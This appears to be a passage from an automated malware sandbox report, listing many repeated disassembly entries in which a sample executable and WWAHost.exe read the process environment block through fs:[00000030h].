          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A24257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A65BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A4D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A423E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A423E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A423E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A68B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A514FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A68CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A2C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A2C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A52D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A52D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A52D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A52D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A52D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A52D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A52D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A48DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A68D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A1A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A13540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A43D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A146A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A2FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A4FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A68ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A4FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A17794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A17794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A17794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A6070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A6070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A2FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A2FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00994F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00994F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A68F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009AEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009AFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ED138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ECD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E42397 mov eax, dword ptr fs:[00000030h]
